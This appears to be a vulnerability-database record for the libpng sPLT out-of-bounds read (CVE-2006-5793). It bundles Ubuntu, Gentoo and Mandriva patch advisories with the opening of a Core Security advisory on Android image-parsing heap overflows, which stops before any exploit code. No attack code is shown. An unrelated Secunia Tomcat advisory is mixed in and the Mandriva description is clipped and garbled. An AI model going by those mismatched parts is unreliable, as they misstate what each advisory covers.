"cpe:2.3:a:greg_roelofs:libpng:1.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.0.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:greg_roelofs:libpng:1.2.7rc1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2006-5793" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Tavis Ormandy from the Gentoo Linux Security Auditing Team discovered this vulnerability.", "sources": [ { "db": "BID", "id": "21078" }, { "db": "CNNVD", "id": "CNNVD-200611-295" } ], "trust": 0.9 }, "cve": "CVE-2006-5793", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", "exploitabilityScore": 4.9, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": true, "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 2.6, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2006-5793", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2006-5793", "trust": 1.8, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-200611-295", "trust": 0.6, "value": "LOW" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via malformed sPLT chunks that trigger an out-of-bounds read. PNG (Portable Network Graphics) Format image processing library libpng In png_set_sPLT() In the function sPLT In the chunk processing code section, PNG There is a problem that memory access violation occurs due to image processing.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) May be in a state. The \u0027libpng\u0027 graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error. \nAttackers may exploit this vulnerability to crash an application that relies on the affected library. =========================================================== \nUbuntu Security Notice USN-383-1 November 16, 2006\nlibpng vulnerability\nCVE-2006-5793\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 5.10\nUbuntu 6.06 LTS\nUbuntu 6.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 5.10:\n libpng10-0 1.0.18-1ubuntu3.1\n\nUbuntu 6.06 LTS:\n libpng12-0 1.2.8rel-5ubuntu0.1\n\nUbuntu 6.10:\n libpng12-0 1.2.8rel-5.1ubuntu0.1\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nDetails follow:\n\nTavis Ormandy discovered that libpng did not correctly calculate the \nsize of sPLT structures when reading an image. \n\n\nUpdated packages for Ubuntu 5.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.diff.gz\n Size/MD5: 12960 3ae9ff536ba163efc00070487687399b\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.dsc\n Size/MD5: 636 3af55a46b4ada05160527a49c5dd6671\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18.orig.tar.gz\n Size/MD5: 506181 40081bdc82e4c6cf782553cd5aa8d9d8\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng2-dev_1.0.18-1ubuntu3.1_all.deb\n Size/MD5: 1166 160ce752a119a735d2abf03ec1f1dd55\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng2_1.0.18-1ubuntu3.1_all.deb\n Size/MD5: 942 e3c40272cd978953acf3469dbda42a30\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_amd64.deb\n Size/MD5: 113890 e395ef9909e34cc4333fb868a7a794f2\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_amd64.deb\n Size/MD5: 197710 1b46e5c7e431d6640e319ca81f0634ad\n\n i386 architecture (x86 compatible Intel/AMD)\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_i386.deb\n Size/MD5: 109224 e083cb785e2bc0225b47fee51c69b22b\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_i386.deb\n Size/MD5: 186536 476d8276b05d075552fc878547a17092\n\n powerpc architecture (Apple Macintosh G3/G4/G5)\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_powerpc.deb\n Size/MD5: 111444 cda22be3ef3d978e4aa3c7111c7f7436\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_powerpc.deb\n Size/MD5: 196744 db0ae3294f47addab0ff52b4d134fff8\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_sparc.deb\n Size/MD5: 109078 26672912dc8d37ae7afbc57fba8cc477\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_sparc.deb\n Size/MD5: 192902 458ef029777b12b5b4165e63d097c774\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.diff.gz\n Size/MD5: 16308 c13ba4eb92c046153c73cec343ba0dad\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.dsc\n Size/MD5: 652 ec80abc5bbe3fb9593374a6df3e5351d\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.1_all.deb\n Size/MD5: 842 db0b015e80f042a3311152aad1a1f96f\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_amd64.udeb\n Size/MD5: 69468 8c741fd0d0ff83068e6dd78bc2e026c1\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_amd64.deb\n Size/MD5: 113808 c86b5b27effab5f974f4f2c4ce743515\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_amd64.deb\n Size/MD5: 247500 6493fda0d94d75f2255cb48399fa5fec\n\n i386 architecture (x86 compatible Intel/AMD)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_i386.udeb\n Size/MD5: 66918 38259ac6fd9f0b4fc56e59b9b8fa75e4\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_i386.deb\n Size/MD5: 111304 440e23028cc1c9de3fb459f8969641d5\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_i386.deb\n Size/MD5: 239650 0235a7988ea235573758fd45a7500cf9\n\n powerpc architecture (Apple Macintosh G3/G4/G5)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_powerpc.udeb\n Size/MD5: 66284 ba2f362738e47667364a69a7425a4bae\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_powerpc.deb\n Size/MD5: 110738 27426cfb75acb15305d71a26d79ecf70\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_powerpc.deb\n Size/MD5: 245228 297d5a07d22ea0c2deb1e3a2da22cc7d\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_sparc.udeb\n Size/MD5: 63820 b28e9240844c87f288986efcfaa6d82b\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_sparc.deb\n Size/MD5: 108438 439feb51a430e75b0314ebd0bbe9eeaf\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_sparc.deb\n Size/MD5: 240068 f1d19c0623d6a875c240ae809f39cc37\n\nUpdated packages for Ubuntu 6.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.diff.gz\n Size/MD5: 16419 341fce97b60457776d7d5b3045e98ab8\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.dsc\n Size/MD5: 659 128223fd1ee1485c1edda30965e2c638\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.1_all.deb\n Size/MD5: 884 ff80da62782949d9ee6e2f45de7368d8\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_amd64.udeb\n Size/MD5: 68974 410bb02f1680b74c0b7bdfe75b6d4f6c\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_amd64.deb\n Size/MD5: 113470 595b09232667d5f45bfc94cbac2154e4\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_amd64.deb\n Size/MD5: 247126 af29f417517106cf651dab5c92ad52ee\n\n i386 architecture (x86 compatible Intel/AMD)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_i386.udeb\n Size/MD5: 69914 d335eae45c97a06251e2b1bb263a0f78\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_i386.deb\n Size/MD5: 114466 eb4ebc44ac004eddd4ac551f443d9196\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_i386.deb\n Size/MD5: 242864 a79b348098a3e5051a93dcc3bfc44f80\n\n powerpc architecture (Apple Macintosh G3/G4/G5)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_powerpc.udeb\n Size/MD5: 67592 c11829d98adc0dd16883d1b00c773691\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_powerpc.deb\n Size/MD5: 112146 e95acde5a5756fe1e8ae3085e160a437\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_powerpc.deb\n Size/MD5: 246662 eea28613a44952b49f1ebd1c9365c31e\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_sparc.udeb\n Size/MD5: 64644 0a019f09ea70eb9e0734542116919875\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_sparc.deb\n Size/MD5: 109320 c8c61d5fc9db2c8edf9ca933bc0aeea6\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_sparc.deb\n Size/MD5: 241060 a4d7a38de962236150bbbb84be9c542f\n\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 200611-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libpng: Denial of Service\n Date: November 17, 2006\n Bugs: #154380\n ID: 200611-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nA vulnerability in libpng may allow a remote attacker to crash\napplications that handle untrusted images. \n\nBackground\n==========\n\nlibpng is a free ANSI C library used to process and manipulate PNG\nimages. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/libpng \u003c 1.2.13 \u003e= 1.2.13\n\nDescription\n===========\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered that a\nvulnerability exists in the sPLT chunk handling code of libpng, a large\nsPLT chunk may cause an application to attempt to read out of bounds. \n\nImpact\n======\n\nA remote attacker could craft an image that when processed or viewed by\nan application using libpng causes the application to terminate\nabnormally. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libpng users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.2.13\"\n\nReferences\n==========\n\n [ 1 ] CVE-2006-5793\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-200611-09.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2006 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ----------------------------------------------------------------------\n\nDo you need accurate and reliable IDS / IPS / AV detection rules?\n\nGet in-depth vulnerability details:\nhttp://secunia.com/binary_analysis/sample_analysis/\n\n----------------------------------------------------------------------\n\nTITLE:\nFUJITSU Interstage Products Apache Tomcat Security Bypass\n\nSECUNIA ADVISORY ID:\nSA32234\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/32234/\n\nCRITICAL:\nNot critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nInterstage Application Server 6.x\nhttp://secunia.com/advisories/product/13693/\nInterstage Application Server 7.x\nhttp://secunia.com/advisories/product/13692/\nInterstage Application Server 8.x\nhttp://secunia.com/advisories/product/13685/\nInterstage Application Server 9.x\nhttp://secunia.com/advisories/product/15986/\nInterstage Apworks 6.x\nhttp://secunia.com/advisories/product/13688/\nInterstage Apworks 7.x\nhttp://secunia.com/advisories/product/13689/\nInterstage Studio 8.x\nhttp://secunia.com/advisories/product/13690/\nInterstage Studio 9.x\nhttp://secunia.com/advisories/product/15610/\nInterstage Business Application Server 8.x\nhttp://secunia.com/advisories/product/13687/\nInterstage Job Workload Server 8.x\nhttp://secunia.com/advisories/product/13686/\n\nDESCRIPTION:\nA security issue has been reported in various FUJITSU Interstage\nproducts, which potentially can be exploited by malicious people to\nbypass certain security restrictions. \n\nThe security issue is caused due to a synchronisation problem when\nchecking IP addresses and can be exploited to bypass a filter valve\nthat extends \"RemoteFilterValve\" and potentially gain access to\nprotected contexts. \n\nSOLUTION:\nPatches are scheduled for release. \n\nUse a proxy or firewall to protect resources. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nFUJITSU:\nhttp://www.fujitsu.com/global/support/software/security/products-f/interstage-200806e.html\n\nJVN:\nhttp://jvn.jp/en/jp/JVN30732239/index.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n \n Mandriva Linux Security Advisory MDKSA-2006:212\n http://www.mandriva.com/security/\n _______________________________________________________________________\n \n Package : doxygen\n Date : November 16, 2006\n Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0\n _______________________________________________________________________\n \n Problem Description:\n \n Doxygen is a documentation system for C, C++ and IDL. (CVE-2006-3334)\n\n It is questionable whether this issue is actually exploitable, but the\n patch to correct the issue has been included in versions \u003c 1.2.12. (CVE-2006-5793)\n\n In addition, an patch to address several old vulnerabilities has been\n applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,\n CAN-2004-0598, CAN-2004-0599)\n\n Packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2006.0:\n f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm \n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\n\n Mandriva Linux 2006.0/X86_64:\n fc3e569bd8ad2aa9aea76a6f4246cfec 2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm \n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\n\n Mandriva Linux 2007.0:\n 9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm \n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n 7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm \n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\n\n Corporate 3.0:\n 9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm \n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm \n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\n\n Corporate 4.0:\n a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm \n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm \n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q\npK8OJ2vhx3DqZ400EPH5QMw=\n=R8Jo\n-----END PGP SIGNATURE-----\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs\n\nMultiple vulnerabilities in Google\u0027s Android SDK\n\n\n*Advisory Information*\n\nTitle: Multiple vulnerabilities in Google\u0027s Android SDK\nAdvisory ID: CORE-2008-0124\nAdvisory URL: http://www.coresecurity.com/?action=item\u0026id=2148\nDate published: 2008-03-04\nDate of last update: 2008-03-04\nVendors contacted: Google\nRelease mode: Coordinated release\n\n\n*Vulnerability Information*\n\nClass: Heap overflow, integer overflow\nRemotely Exploitable: No\nLocally Exploitable: No\nBugtraq ID: 28006, 28005\t\nCVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,\nCVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269\t\n\n\n*Vulnerability Description*\n\nAndroid is project promoted primarily by Google through the Open Handset\nAlliance aimed at providing a complete set of software for mobile\ndevices: an operating system, middleware and key mobile applications\n[1]. Although the project is currently in a development phase and has\nnot made an official release yet, several vendors of mobile chips have\nunveiled prototype phones built using development releases of the\nplatform at the Mobile World Congress [2]. Development using the Android\nplatform gained activity early in 2008 as a result of Google\u0027s launch of\nthe Android Development Challenge which includes $10 million USD in\nawards [3] for which a Software Development Kit (SDK) was made available\nin November 2007. \n\n The Android Software Development Kit includes a fully functional\noperating system, a set of core libraries, application development\nframeworks, a virtual machine for executing application and a phone\nemulator based on the QEMU emulator [4]. Public reports as of February\n27th, 2008 state that the Android SDK has been downloaded 750,000 times\nsince November 2007 [5]. \n\n Several vulnerabilities have been found in Android\u0027s core libraries for\nprocessing graphic content in some of the most used image formats (PNG,\nGIF an BMP). While some of these vulnerabilities stem from the use of\noutdated and vulnerable open source image processing libraries other\nwere introduced by native Android code that use them or that implements\nnew functionality. \n\n Exploitation of these vulnerabilities to yield complete control of a\nphone running the Android platform has been proved possible using the\nemulator included in the SDK, which emulates phone running the Android\nplatform on an ARM microprocessor. \n\n This advisory contains technical descriptions of these security bugs,\nincluding a proof of concept exploit to run arbitrary code, proving the\npossibility of running code on Android stack (over an ARM architecture)\nvia a binary exploit. \n\n\n\n\n*Vulnerable Packages*\n\n. Android SDK m3-rc37a and earlier are vulnerable several bugs in\ncomponents that process GIF, PNG and BMP images (bugs #1, #2 and #3 of\nthis advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component\nthat process BMP images (bug #3). \n\n\n*Non-vulnerable Packages*\n\n. Android SDK m5-rc15\n\n\n*Vendor Information, Solutions and Workarounds*\n\nVendor statement:\n\n\"The current version of the Android SDK is an early look release to the\nopen source community, provided so that developers can begin working\nwith the platform to inform and shape our development of Android toward\nproduction readiness. The Open Handset Alliance welcomes input from the\nsecurity community throughout this process. There will be many changes\nand updates to the platform before Android is ready for end users,\nincluding a full security review.\"\n\n\n*Credits*\n\nThese vulnerabilities were discovered by Alfredo Ortega from Core\nSecurity Technologies, leading his Bugweek 2007 team called \"Pampa\nGrande\". It was researched in depth by Alfredo Ortega. \n\n\n*Technical Description / Proof of Concept Code*\n\nAndroid is a software stack for mobile devices that includes an\noperating system, middleware and key applications. Android relies on\nLinux version 2.6 for core system services such as security, memory\nmanagement, process management, network stack, and driver model. The\nkernel also acts as an abstraction layer between the hardware and the\nrest of the software stack. \n\n The WebKit application framework is included to facilitate development\nof web client application functionality. The framework in turn uses\ndifferent third-party open source libraries to implement processing of\nseveral image formats. \n\n Android includes a web browser based on the Webkit framework that\ncontains multiple binary vulnerabilities when processing .GIF, .PNG and\n.BMP image files, allowing malicious client-side attacks on the web\nbrowser. A client-side attack could be launched from a malicious web\nsite, hosting specially crafted content, with the possibility of\nexecuting arbitrary code on the victim\u0027s Android system. \n\n These client-side binary vulnerabilities were discovered using the\nAndroid SDK that includes an ARM architecture emulator. Binary\nvulnerabilities are the most common security bugs in computer software. \nBasic bibliography on these vulnerabilities includes a recently updated\nhandbook about security holes that also describes current\nstate-of-the-start exploitation techniques for different hardware\nplatforms and operating systems [6]. \n\n The vulnerabilities discovered are summarized below grouped by the type\nof image file format that is parsed by the vulnerable component. \n\n #1 - GIF image parsing heap overflow\n\nThe Graphics Interchange Format (GIF) is image format dating at least\nfrom 1989 [7]. It was popularized because GIF images can be compressed\nusing the Lempel-Ziv-Welch (LZW) compression technique thus reducing the\nmemory footprint and bandwidth required for transmission and storage. \n\n A memory corruption condition happens within the GIF processing library\nof the WebKit framework when the function \u0027GIFImageDecoder::onDecode()\u0027\nallocates a heap buffer based on the _Logical Screen Width and Height_\nfiled of the GIF header (offsets 6 and 8) and then the resulting buffer\nis filled in with an amount of data bytes that is calculated based on\nthe real Width and Height of the GIF image. There is a similar (if not\nthe same) bug in the function 